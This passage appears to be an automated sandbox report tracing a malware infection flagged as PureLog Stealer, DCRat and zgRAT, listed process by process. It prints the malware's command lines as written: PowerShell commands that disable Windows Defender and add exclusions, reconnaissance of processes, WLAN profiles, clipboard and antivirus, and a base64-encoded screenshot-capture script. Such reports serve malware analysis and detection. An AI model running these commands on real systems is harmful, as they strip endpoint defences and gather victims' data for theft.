Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:07:08
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Imagebase:	0x540000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	18:07:09
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	18:07:10
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff70f330000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-Clipboard
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Imagebase:	0x7ff7a7880000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff66f390000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	18:07:11
Start date:	01/08/2024
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff66f390000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Imagebase:	0xaf0000
File size:	3'720'704 bytes
MD5 hash:	5FE249BBCC644C6F155D86E8B3CC1E12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000034.00000000.1797015711.0000000000AF2000.00000002.00000001.01000000.00000025.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000034.00000002.1960895196.000000001341B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
Antivirus matches:	Detection: 92%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
Imagebase:	0x7ff6eab90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh wlan show profile
Imagebase:	0x7ff7e6cf0000
File size:	96'768 bytes
MD5 hash:	6F1E6DD688818BC3D1391D0CC7D597EB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	18:07:12
Start date:	01/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	18:07:13
Start date:	01/08/2024
Path:	C:\Windows\System32\tree.com
Wow64 process (32bit):	false
Commandline:	tree /A /F
Imagebase:	0x7ff768f20000
File size:	20'992 bytes
MD5 hash:	9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	18:07:13
Start date:	01/08/2024
Path:	C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):	false
Commandline:	systeminfo
Imagebase:	0x7ff70baa0000
File size:	110'080 bytes
MD5 hash:	EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	18:07:13
Start date:	01/08/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAG